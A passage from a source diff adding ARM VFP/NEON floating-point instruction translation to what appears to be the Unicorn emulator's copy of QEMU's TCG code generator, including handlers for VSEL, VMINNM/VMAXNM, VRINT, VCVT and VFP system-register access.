addr, get_mem_index(s)); + break; + default: /* Avoid compiler warnings. */ + abort(); + } + return tmp; +} + +static int handle_vsel(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rn, uint32_t rm, + uint32_t dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t cc = extract32(insn, 20, 2); + + if (dp) { + TCGv_i64 frn, frm, dest; + TCGv_i64 tmp, zero, zf, nf, vf; + + zero = tcg_const_i64(tcg_ctx, 0); + + frn = tcg_temp_new_i64(tcg_ctx); + frm = tcg_temp_new_i64(tcg_ctx); + dest = tcg_temp_new_i64(tcg_ctx); + + zf = tcg_temp_new_i64(tcg_ctx); + nf = tcg_temp_new_i64(tcg_ctx); + vf = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, zf, tcg_ctx->cpu_ZF); + tcg_gen_ext_i32_i64(tcg_ctx, nf, tcg_ctx->cpu_NF); + tcg_gen_ext_i32_i64(tcg_ctx, vf, tcg_ctx->cpu_VF); + + tcg_gen_ld_f64(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f64(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, dest, zf, zero, + frn, frm); + break; + case 1: /* vs: V */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dest, vf, zero, + frn, frm); + break; + case 2: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + frn, frm); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + case 3: /* gt: !Z && N == V */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, dest, zf, zero, + frn, frm); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + dest, frm); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + } + tcg_gen_st_f64(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, frn); + tcg_temp_free_i64(tcg_ctx, frm); + tcg_temp_free_i64(tcg_ctx, dest); + + tcg_temp_free_i64(tcg_ctx, zf); + tcg_temp_free_i64(tcg_ctx, nf); + tcg_temp_free_i64(tcg_ctx, vf); + + 
tcg_temp_free_i64(tcg_ctx, zero); + } else { + TCGv_i32 frn, frm, dest; + TCGv_i32 tmp, zero; + + zero = tcg_const_i32(tcg_ctx, 0); + + frn = tcg_temp_new_i32(tcg_ctx); + frm = tcg_temp_new_i32(tcg_ctx); + dest = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f32(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, dest, tcg_ctx->cpu_ZF, zero, + frn, frm); + break; + case 1: /* vs: V */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dest, tcg_ctx->cpu_VF, zero, + frn, frm); + break; + case 2: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + frn, frm); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 3: /* gt: !Z && N == V */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dest, tcg_ctx->cpu_ZF, zero, + frn, frm); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + dest, frm); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + } + tcg_gen_st_f32(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, frn); + tcg_temp_free_i32(tcg_ctx, frm); + tcg_temp_free_i32(tcg_ctx, dest); + + tcg_temp_free_i32(tcg_ctx, zero); + } + + return 0; +} + +static int handle_vminmaxnm(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rn, + uint32_t rm, uint32_t dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t vmin = extract32(insn, 6, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + + if (dp) { + TCGv_i64 frn, frm, dest; + + frn = tcg_temp_new_i64(tcg_ctx); + frm = tcg_temp_new_i64(tcg_ctx); + dest = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ld_f64(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f64(tcg_ctx, frm, tcg_ctx->cpu_env, 
vfp_reg_offset(dp, rm)); + if (vmin) { + gen_helper_vfp_minnumd(tcg_ctx, dest, frn, frm, fpst); + } else { + gen_helper_vfp_maxnumd(tcg_ctx, dest, frn, frm, fpst); + } + tcg_gen_st_f64(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, frn); + tcg_temp_free_i64(tcg_ctx, frm); + tcg_temp_free_i64(tcg_ctx, dest); + } else { + TCGv_i32 frn, frm, dest; + + frn = tcg_temp_new_i32(tcg_ctx); + frm = tcg_temp_new_i32(tcg_ctx); + dest = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_f32(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f32(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + if (vmin) { + gen_helper_vfp_minnums(tcg_ctx, dest, frn, frm, fpst); + } else { + gen_helper_vfp_maxnums(tcg_ctx, dest, frn, frm, fpst); + } + tcg_gen_st_f32(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, frn); + tcg_temp_free_i32(tcg_ctx, frm); + tcg_temp_free_i32(tcg_ctx, dest); + } + + tcg_temp_free_ptr(tcg_ctx, fpst); + return 0; +} + +static int handle_vrint(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rm, uint32_t dp, + int rounding) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode; + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + + if (dp) { + TCGv_i64 tcg_op; + TCGv_i64 tcg_res; + tcg_op = tcg_temp_new_i64(tcg_ctx); + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, tcg_op, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + tcg_gen_st_f64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } else { + TCGv_i32 tcg_op; + TCGv_i32 tcg_res; + tcg_op = tcg_temp_new_i32(tcg_ctx); + tcg_res = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_op, tcg_ctx->cpu_env, vfp_reg_offset(dp, 
rm)); + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + tcg_gen_st_f32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); + } + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + + tcg_temp_free_ptr(tcg_ctx, fpst); + return 0; +} + +static int handle_vcvt(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rm, uint32_t dp, + int rounding) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_signed = extract32(insn, 7, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode, tcg_shift; + + tcg_shift = tcg_const_i32(tcg_ctx, 0); + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + + if (dp) { + TCGv_i64 tcg_double, tcg_res; + TCGv_i32 tcg_tmp; + /* Rd is encoded as a single precision register even when the source + * is double precision. 
+ */ + rd = ((rd << 1) & 0x1e) | ((rd >> 4) & 0x1); + tcg_double = tcg_temp_new_i64(tcg_ctx); + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, tcg_double, tcg_ctx->cpu_env, vfp_reg_offset(1, rm)); + if (is_signed) { + gen_helper_vfp_tosld(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); + } else { + gen_helper_vfp_tould(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); + } + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp, tcg_res); + tcg_gen_st_f32(tcg_ctx, tcg_tmp, tcg_ctx->cpu_env, vfp_reg_offset(0, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_tmp); + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_double); + } else { + TCGv_i32 tcg_single, tcg_res; + tcg_single = tcg_temp_new_i32(tcg_ctx); + tcg_res = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_single, tcg_ctx->cpu_env, vfp_reg_offset(0, rm)); + if (is_signed) { + gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); + } else { + gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); + } + tcg_gen_st_f32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(0, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_single); + } + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + + tcg_temp_free_i32(tcg_ctx, tcg_shift); + + tcg_temp_free_ptr(tcg_ctx, fpst); + + return 0; +} + +/* Table for converting the most common AArch32 encoding of + * rounding mode to arm_fprounding order (which matches the + * common AArch64 order); see ARM ARM pseudocode FPDecodeRM(). 
+ */ +static const uint8_t fp_decode_rm[] = { + FPROUNDING_TIEAWAY, + FPROUNDING_TIEEVEN, + FPROUNDING_POSINF, + FPROUNDING_NEGINF, +}; + +static int disas_vfp_v8_insn(DisasContext *s, uint32_t insn) +{ + uint32_t rd, rn, rm, dp = extract32(insn, 8, 1); + + if (!arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + + if (dp) { + VFP_DREG_D(rd, insn); + VFP_DREG_N(rn, insn); + VFP_DREG_M(rm, insn); + } else { + rd = VFP_SREG_D(insn); + rn = VFP_SREG_N(insn); + rm = VFP_SREG_M(insn); + } + + if ((insn & 0x0f800e50) == 0x0e000a00) { + return handle_vsel(s, insn, rd, rn, rm, dp); + } else if ((insn & 0x0fb00e10) == 0x0e800a00) { + return handle_vminmaxnm(s, insn, rd, rn, rm, dp); + } else if ((insn & 0x0fbc0ed0) == 0x0eb80a40) { + /* VRINTA, VRINTN, VRINTP, VRINTM */ + int rounding = fp_decode_rm[extract32(insn, 16, 2)]; + return handle_vrint(s, insn, rd, rm, dp, rounding); + } else if ((insn & 0x0fbc0e50) == 0x0ebc0a40) { + /* VCVTA, VCVTN, VCVTP, VCVTM */ + int rounding = fp_decode_rm[extract32(insn, 16, 2)]; + return handle_vcvt(s, insn, rd, rm, dp, rounding); + } + return 1; +} + +/* Disassemble a VFP instruction. Returns nonzero if an error occurred + (ie. an undefined instruction). */ +static int disas_vfp_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t rd, rn, rm, op, i, n, offset, delta_d, delta_m, bank_mask; + int dp, veclen; + TCGv_i32 addr; + TCGv_i32 tmp; + TCGv_i32 tmp2; + + if (!arm_dc_feature(s, ARM_FEATURE_VFP)) { + return 1; + } + + /* FIXME: this access check should not take precedence over UNDEF + * for invalid encodings; we will generate incorrect syndrome information + * for attempts to execute invalid vfp/neon encodings with FP disabled. + */ + if (!s->cpacr_fpen) { + gen_exception_insn(s, 4, EXCP_UDEF, + syn_fp_access_trap(1, 0xe, s->thumb)); + return 0; + } + + if (!s->vfp_enabled) { + /* VFP disabled. Only allow fmxr/fmrx to/from some control regs. 
*/ + if ((insn & 0x0fe00fff) != 0x0ee00a10) + return 1; + rn = (insn >> 16) & 0xf; + if (rn != ARM_VFP_FPSID && rn != ARM_VFP_FPEXC && rn != ARM_VFP_MVFR2 + && rn != ARM_VFP_MVFR1 && rn != ARM_VFP_MVFR0) { + return 1; + } + } + + if (extract32(insn, 28, 4) == 0xf) { + /* Encodings with T=1 (Thumb) or unconditional (ARM): + * only used in v8 and above. + */ + return disas_vfp_v8_insn(s, insn); + } + + dp = ((insn & 0xf00) == 0xb00); + switch ((insn >> 24) & 0xf) { + case 0xe: + if (insn & (1 << 4)) { + /* single register transfer */ + rd = (insn >> 12) & 0xf; + if (dp) { + int size; + int pass; + + VFP_DREG_N(rn, insn); + if (insn & 0xf) + return 1; + if (insn & 0x00c00060 + && !arm_dc_feature(s, ARM_FEATURE_NEON)) { + return 1; + } + + pass = (insn >> 21) & 1; + if (insn & (1 << 22)) { + size = 0; + offset = ((insn >> 5) & 3) * 8; + } else if (insn & (1 << 5)) { + size = 1; + offset = (insn & (1 << 6)) ? 16 : 0; + } else { + size = 2; + offset = 0; + } + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + tmp = neon_load_reg(tcg_ctx, rn, pass); + switch (size) { + case 0: + if (offset) + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, offset); + if (insn & (1 << 23)) + gen_uxtb(tmp); + else + gen_sxtb(tmp); + break; + case 1: + if (insn & (1 << 23)) { + if (offset) { + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + } else { + gen_uxth(tmp); + } + } else { + if (offset) { + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, 16); + } else { + gen_sxth(tmp); + } + } + break; + case 2: + break; + } + store_reg(s, rd, tmp); + } else { + /* arm->vfp */ + tmp = load_reg(s, rd); + if (insn & (1 << 23)) { + /* VDUP */ + if (size == 0) { + gen_neon_dup_u8(s, tmp, 0); + } else if (size == 1) { + gen_neon_dup_low16(s, tmp); + } + for (n = 0; n <= pass * 2; n++) { + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + neon_store_reg(tcg_ctx, rn, n, tmp2); + } + neon_store_reg(tcg_ctx, rn, n, tmp); + } else { + /* VMOV */ + switch (size) { + case 0: + tmp2 = neon_load_reg(tcg_ctx, rn, pass); 
+ tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 8); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 1: + tmp2 = neon_load_reg(tcg_ctx, rn, pass); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 16); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 2: + break; + } + neon_store_reg(tcg_ctx, rn, pass, tmp); + } + } + } else { /* !dp */ + if ((insn & 0x6f) != 0x00) + return 1; + rn = VFP_SREG_N(insn); + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + if (insn & (1 << 21)) { + /* system register */ + rn >>= 1; + + switch (rn) { + case ARM_VFP_FPSID: + /* VFP2 allows access to FSID from userspace. + VFP3 restricts all id registers to privileged + accesses. */ + if (IS_USER(s) + && arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPEXC: + if (IS_USER(s)) + return 1; + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPINST: + case ARM_VFP_FPINST2: + /* Not present in VFP3. */ + if (IS_USER(s) + || arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPSCR: + if (rd == 15) { + tmp = load_cpu_field(s->uc, vfp.xregs[ARM_VFP_FPSCR]); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xf0000000); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_get_fpscr(tcg_ctx, tmp, tcg_ctx->cpu_env); + } + break; + case ARM_VFP_MVFR2: + if (!arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + /* fall through */ + case ARM_VFP_MVFR0: + case ARM_VFP_MVFR1: + if (IS_USER(s) + || !arm_dc_feature(s, ARM_FEATURE_MVFR)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + default: + return 1; + } + } else { + gen_mov_F0_vreg(s, 0, rn); + tmp = gen_vfp_mrs(s); + } + if (rd == 15) { + /* Set the 4 flag bits in the CPSR. 
*/ + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rd, tmp); + } + } else { + /* arm->vfp */ + if (insn & (1 << 21)) { + rn >>= 1; + /* system register */ + switch (rn) { + case ARM_VFP_FPSID: + case ARM_VFP_MVFR0: + case ARM_VFP_MVFR1: + /* Writes are ignored. */ + break; + case ARM_VFP_FPSCR: + tmp = load_reg(s, rd); + gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + break; + case ARM_VFP_FPEXC: + if (IS_USER(s)) + return 1; + /* TODO: VFP subarchitecture support. + * For now, keep the EN bit only */ + tmp = load_reg(s, rd); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1 << 30); + store_cpu_field(tcg_ctx, tmp, vfp.xregs[rn]); + gen_lookup_tb(s); + break; + case ARM_VFP_FPINST: + case ARM_VFP_FPINST2: + if (IS_USER(s)) { + return 1; + } + tmp = load_reg(s, rd); + store_cpu_field(tcg_ctx, tmp, vfp.xregs[rn]); + break; + default: + return 1; + } + } else { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rn); + } + } + } + } else { + /* data processing */ + /* The opcode is in bits 23, 21, 20 and 6. */ + op = ((insn >> 20) & 8) | ((insn >> 19) & 6) | ((insn >> 6) & 1); + if (dp) { + if (op == 15) { + /* rn is opcode */ + rn = ((insn >> 15) & 0x1e) | ((insn >> 7) & 1); + } else { + /* rn is register number */ + VFP_DREG_N(rn, insn); + } + + if (op == 15 && (rn == 15 || ((rn & 0x1c) == 0x18) || + ((rn & 0x1e) == 0x6))) { + /* Integer or single/half precision destination. */ + rd = VFP_SREG_D(insn); + } else { + VFP_DREG_D(rd, insn); + } + if (op == 15 && + (((rn & 0x1c) == 0x10) || ((rn & 0x14) == 0x14) || + ((rn & 0x1e) == 0x4))) { + /* VCVT from int or half precision is always from S reg + * regardless of dp bit. VCVT with immediate frac_bits + * has same format as SREG_M. + */ + rm = VFP_SREG_M(insn); + } else { + VFP_DREG_M(rm, insn); + } + } else { + rn = VFP_SREG_N(insn); + if (op == 15 && rn == 15) { + /* Double precision destination. 
*/ + VFP_DREG_D(rd, insn); + } else { + rd = VFP_SREG_D(insn); + } + /* NB that we implicitly rely on the encoding for the frac_bits + * in VCVT of fixed to float being the same as that of an SREG_M + */ + rm = VFP_SREG_M(insn); + } + + veclen = s->vec_len; + if (op == 15 && rn > 3) + veclen = 0; + + /* Shut up compiler warnings. */ + delta_m = 0; + delta_d = 0; + bank_mask = 0; + + if (veclen > 0) { + if (dp) + bank_mask = 0xc; + else + bank_mask = 0x18; + + /* Figure out what type of vector operation this is. */ + if ((rd & bank_mask) == 0) { + /* scalar */ + veclen = 0; + } else { + if (dp) + delta_d = (s->vec_stride >> 1) + 1; + else + delta_d = s->vec_stride + 1; + + if ((rm & bank_mask) == 0) { + /* mixed scalar/vector */ + delta_m = 0; + } else { + /* vector */ + delta_m = delta_d; + } + } + } + + /* Load the initial operands. */ + if (op == 15) { + switch (rn) { + case 16: + case 17: + /* Integer source */ + gen_mov_F0_vreg(s, 0, rm); + break; + case 8: + case 9: + /* Compare */ + gen_mov_F0_vreg(s, dp, rd); + gen_mov_F1_vreg(s, dp, rm); + break; + case 10: + case 11: + /* Compare with zero */ + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_F1_ld0(s, dp); + break; + case 20: + case 21: + case 22: + case 23: + case 28: + case 29: + case 30: + case 31: + /* Source and destination the same. */ + gen_mov_F0_vreg(s, dp, rd); + break; + case 4: + case 5: + case 6: + case 7: + /* VCVTB, VCVTT: only present with the halfprec extension + * UNPREDICTABLE if bit 8 is set prior to ARMv8 + * (we choose to UNDEF) + */ + if ((dp && !arm_dc_feature(s, ARM_FEATURE_V8)) || + !arm_dc_feature(s, ARM_FEATURE_VFP_FP16)) { + return 1; + } + if (!extract32(rn, 1, 1)) { + /* Half precision source. */ + gen_mov_F0_vreg(s, 0, rm); + break; + } + /* Otherwise fall through */ + default: + /* One source operand. */ + gen_mov_F0_vreg(s, dp, rm); + break; + } + } else { + /* Two source operands. 
*/ + gen_mov_F0_vreg(s, dp, rn); + gen_mov_F1_vreg(s, dp, rm); + } + + for (;;) { + /* Perform the calculation. */ + switch (op) { + case 0: /* VMLA: fd + (fn * fm) */ + /* Note that order of inputs to the add matters for NaNs */ + gen_vfp_F1_mul(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_add(s, dp); + break; + case 1: /* VMLS: fd + -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_F1_neg(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_add(s, dp); + break; + case 2: /* VNMLS: -fd + (fn * fm) */ + /* Note that it isn't valid to replace (-A + B) with (B - A) + * or similar plausible looking simplifications + * because this will give wrong results for NaNs. + */ + gen_vfp_F1_mul(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_neg(s, dp); + gen_vfp_add(s, dp); + break; + case 3: /* VNMLA: -fd + -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_F1_neg(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_neg(s, dp); + gen_vfp_add(s, dp); + break; + case 4: /* mul: fn * fm */ + gen_vfp_mul(s, dp); + break; + case 5: /* nmul: -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_neg(s, dp); + break; + case 6: /* add: fn + fm */ + gen_vfp_add(s, dp); + break; + case 7: /* sub: fn - fm */ + gen_vfp_sub(s, dp); + break; + case 8: /* div: fn / fm */ + gen_vfp_div(s, dp); + break; + case 10: /* VFNMA : fd = muladd(-fd, fn, fm) */ + case 11: /* VFNMS : fd = muladd(-fd, -fn, fm) */ + case 12: /* VFMA : fd = muladd( fd, fn, fm) */ + case 13: /* VFMS : fd = muladd( fd, -fn, fm) */ + /* These are fused multiply-add, and must be done as one + * floating point operation with no rounding between the + * multiplication and addition steps. + * NB that doing the negations here as separate steps is + * correct : an input NaN should come out with its sign bit + * flipped if it is a negated-input. 
+ */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP4)) { + return 1; + } + if (dp) { + TCGv_ptr fpst; + TCGv_i64 frd; + if (op & 1) { + /* VFNMS, VFMS */ + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + } + frd = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, frd, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + if (op & 2) { + /* VFNMA, VFNMS */ + gen_helper_vfp_negd(tcg_ctx, frd, frd); + } + fpst = get_fpstatus_ptr(s, 0); + gen_helper_vfp_muladdd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_F1d, frd, fpst); + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, frd); + } else { + TCGv_ptr fpst; + TCGv_i32 frd; + if (op & 1) { + /* VFNMS, VFMS */ + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); + } + frd = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, frd, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + if (op & 2) { + gen_helper_vfp_negs(tcg_ctx, frd, frd); + } + fpst = get_fpstatus_ptr(s, 0); + gen_helper_vfp_muladds(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_F1s, frd, fpst); + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, frd); + } + break; + case 14: /* fconst */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + + n = (insn << 12) & 0x80000000; + i = ((insn >> 12) & 0x70) | (insn & 0xf); + if (dp) { + if (i & 0x40) + i |= 0x3f80; + else + i |= 0x4000; + n |= i << 16; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_F0d, ((uint64_t)n) << 32); + } else { + if (i & 0x40) + i |= 0x780; + else + i |= 0x800; + n |= i << 19; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_F0s, n); + } + break; + case 15: /* extension space */ + switch (rn) { + case 0: /* cpy */ + /* no-op */ + break; + case 1: /* abs */ + gen_vfp_abs(s, dp); + break; + case 2: /* neg */ + gen_vfp_neg(s, dp); + break; + case 3: /* sqrt */ + gen_vfp_sqrt(s, dp); + break; + case 4: /* vcvtb.f32.f16, vcvtb.f64.f16 */ + tmp = gen_vfp_mrs(s); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + if (dp) { + 
gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_ctx->cpu_F0d, tmp, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp, + tcg_ctx->cpu_env); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 5: /* vcvtt.f32.f16, vcvtt.f64.f16 */ + tmp = gen_vfp_mrs(s); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + if (dp) { + gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_ctx->cpu_F0d, tmp, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp, + tcg_ctx->cpu_env); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 6: /* vcvtb.f16.f32, vcvtb.f16.f64 */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (dp) { + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_env); + } + gen_mov_F0_vreg(s, 0, rd); + tmp2 = gen_vfp_mrs(s); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + gen_vfp_msr(s, tmp); + break; + case 7: /* vcvtt.f16.f32, vcvtt.f16.f64 */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (dp) { + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_env); + } + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 16); + gen_mov_F0_vreg(s, 0, rd); + tmp2 = gen_vfp_mrs(s); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + gen_vfp_msr(s, tmp); + break; + case 8: /* cmp */ + gen_vfp_cmp(s, dp); + break; + case 9: /* cmpe */ + gen_vfp_cmpe(s, dp); + break; + case 10: /* cmpz */ + gen_vfp_cmp(s, dp); + break; + case 11: /* cmpez */ + gen_vfp_F1_ld0(s, dp); + gen_vfp_cmpe(s, dp); + break; + case 12: /* vrintr */ + { + TCGv_ptr fpst = 